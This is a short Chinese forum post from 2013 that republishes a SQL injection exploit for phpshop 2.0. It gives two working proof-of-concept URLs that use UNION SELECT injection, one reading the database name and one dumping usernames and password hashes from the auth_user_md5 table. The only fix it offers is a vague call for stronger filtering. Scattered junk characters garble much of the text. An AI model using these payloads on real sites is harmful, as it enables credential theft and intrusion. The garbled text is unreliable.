标题 : phpshop 2.0 SQL Injection Vulnerability
: s6 h ~* j& v# v" B; v& |, O4 E3 k/ J$ q5 U. m& ?% B3 Y
作者 : By onestree, E2 y- T+ o9 n7 J, q7 x+ U0 u
下载地址 : http://code.google.com/p/phpshop/downloads/list- X6 s: X. ~, B5 t3 t
测试地址: windows 7 / ubuntu
* e0 W2 k7 t$ g+ P* m
9 k2 m6 v( t/ l6 ?
2 S1 S8 p# x/ R/ F& ~* g. D; cSQLi p0c:! f2 S" E) p8 Z! a4 ]
1 Z0 W/ r/ B& K0 J8 g( s==================
' y: Z' m+ P$ k # v0 ~' D% T/ K7 h* w P9 m% G
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
: z8 E* O h B, Dunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --# q( a( `( n. ~8 w
# A7 e& g( R8 ^) ^. a! vhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--7 T" o Y+ t, }" p. [# x# j0 K" P) u
) C# q* @7 k% a修复:7 Q! O! m7 R/ k9 F2 X9 h" C, Z n
加强过滤& ]2 T8 @7 s8 x- e2 D
8 f. p8 h% ?) L/ }$ H
* H0 x! m+ D$ g$ J" x |
发表于 2013-1-18 18:24:10
收藏
支持
反对